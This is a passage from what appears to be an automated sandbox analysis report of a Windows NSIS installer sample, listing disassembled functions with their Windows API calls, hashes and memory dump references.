                                                                                                            • Opcode ID: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                            • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                            • Opcode Fuzzy Hash: 44adf824a3a4d92ef29847c02d08b50033dbaa36d23830bd28d3a669162fbcd6
                                                                                                            • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                            APIs
                                                                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,75573420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
                                                                                                            • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
                                                                                                            • CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,75573420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
                                                                                                            • CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,75573420,004036EF,?,00000006,00000008,0000000A), ref: 00406706
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Char$Next$Prev
                                                                                                            • String ID: *?|<>/":
                                                                                                            • API String ID: 589700163-165019052
                                                                                                            • Opcode ID: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                            • Instruction ID: ccb021e8c97aa0e4e9f296cc8cc4b0d2e06c32826977e33acd3911ee1a404cd3
                                                                                                            • Opcode Fuzzy Hash: 6f1dc59467bf7cdf849013f1baa50d92fe1cb62039c7f0915d7e3466f5f67e46
                                                                                                            • Instruction Fuzzy Hash: E011C82580061295DB302B548C44B77A2E8EF55764F52843FE985B32C1EB7D5CE28ABD
                                                                                                            APIs
                                                                                                            • lstrcatW.KERNEL32(00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017B0
                                                                                                            • CompareFileTime.KERNEL32(-00000014,?,0040A5D8,0040A5D8,00000000,00000000,0040A5D8,00436000,?,?,00000031), ref: 004017D5
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000,?), ref: 00405488
                                                                                                              • Part of subcall function 00405450: lstrlenW.KERNEL32(00402F08,00422708,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402F08,00000000), ref: 00405498
                                                                                                              • Part of subcall function 00405450: lstrcatW.KERNEL32(00422708,00402F08,00402F08,00422708,00000000,00000000,00000000), ref: 004054AB
                                                                                                              • Part of subcall function 00405450: SetWindowTextW.USER32(00422708,00422708), ref: 004054BD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004054E3
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004054FD
                                                                                                              • Part of subcall function 00405450: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040550B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                            • String ID:
                                                                                                            • API String ID: 1941528284-0
                                                                                                            • Opcode ID: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                            • Instruction ID: 2530360bafa170a9d5e8074bf3c3c5079485a484cad24ccb9f0485aee5561d29
                                                                                                            • Opcode Fuzzy Hash: 55b9c7873fef6a42146c5bba3a7473b4437248d5263e1ddde9fdc16840247bc8
                                                                                                            • Instruction Fuzzy Hash: FF41C671900614BADF11ABA5CD85DAF3679EF05329B20433BF412B10E2CB3C86529A6E
                                                                                                            APIs
                                                                                                            • GetDC.USER32(?), ref: 00401DBC
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                            • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                            • String ID:
                                                                                                            • API String ID: 3808545654-0
                                                                                                            • Opcode ID: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                            • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                            • Opcode Fuzzy Hash: e24a725036941366799e1b60f9567993ca488f5885cb4975d99fb3ecb50d70e9
                                                                                                            • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                            APIs
                                                                                                            • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                            • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                            • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                            • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                            • String ID:
                                                                                                            • API String ID: 1849352358-0
                                                                                                            • Opcode ID: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                            • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                            • Opcode Fuzzy Hash: cecd7757bc9d55480b756717b9ac07822063c1f28e7ac406cf665e6dd60447a2
                                                                                                            • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                            APIs
                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$Timeout
                                                                                                            • String ID: !
                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                            • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                            • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                            • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                            • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                            APIs
                                                                                                            • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$Enum
                                                                                                            • String ID:
                                                                                                            • API String ID: 464197530-0
                                                                                                            • Opcode ID: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                            • Instruction ID: 3410daaf41eb2a8de7896e1fb7aa518538b3e031ab7f3cb45a1fbd23233d04dd
                                                                                                            • Opcode Fuzzy Hash: 1fd681a58c600dee98d7f7e5161f1cc79c94fe5fc9469311f060f0f5731105c3
                                                                                                            • Instruction Fuzzy Hash: CE116A32500108FBDF12AB90CE09FEE7B7DAF44350F100076B905B61E0E7B59E21AB58
                                                                                                            APIs
                                                                                                            • CreateDirectoryW.KERNEL32(?,?,00000000), ref: 00405962
                                                                                                            • GetLastError.KERNEL32 ref: 00405976
                                                                                                            • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040598B
                                                                                                            • GetLastError.KERNEL32 ref: 00405995
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                            • String ID:
                                                                                                            • API String ID: 3449924974-0
                                                                                                            • Opcode ID: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                            • Instruction ID: ca5323325ecea66cc3de0aafa4d6cbc44a00468c8660a14113972894dcb98988
                                                                                                            • Opcode Fuzzy Hash: c15d26eb0fd7dc0754592b558b3576eabd9f17effa54cf70e09af9e442894ad1
                                                                                                            • Instruction Fuzzy Hash: 970108B1C10219DADF009FA5C944BEFBFB4EB14314F00403AE544B6290DB789608CFA9
                                                                                                            APIs
                                                                                                              • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,00437800,?,75572EE0,00405B1A,?,00437800,75572EE0,00000000), ref: 00405D76
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                              • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                            • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,00437800,?,75572EE0,00405B1A,?,00437800,75572EE0,00000000), ref: 00405E1E
                                                                                                            • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,75572EE0,00405B1A,?,00437800,75572EE0), ref: 00405E2E
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                            • String ID: 0_B
                                                                                                            • API String ID: 3248276644-2128305573
                                                                                                            • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                            • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                            • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                            • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                            APIs
                                                                                                            • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                            • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                              • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                            • String ID:
                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                            • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                            • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                            • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                            • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                            • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,004034A3,00437000,00437800,00437800,00437800,00437800,00437800,75573420,004036EF), ref: 00405F46
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountFileNameTempTick
                                                                                                            • String ID: nsa
                                                                                                            • API String ID: 1716503409-2209301699
                                                                                                            • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                            • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                            • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                            • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
                                                                                                            APIs
                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                            Strings
                                                                                                            • Error launching installer, xrefs: 004059E4
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                            • String ID: Error launching installer
                                                                                                            • API String ID: 3712363035-66219284
                                                                                                            • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                            • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                            • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                            • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                            • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                            • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                            • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                            • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                            • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                            • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                            • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                            • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                            • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                            • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                            • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                            • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                            • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                            • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                            • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000005.00000002.2717926385.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000005.00000002.2717907797.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717945007.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717969676.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000005.00000002.2717997307.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_5_2_400000_4UQ5wnI389.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                            • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                            • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                            • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                            Memory Dump Source
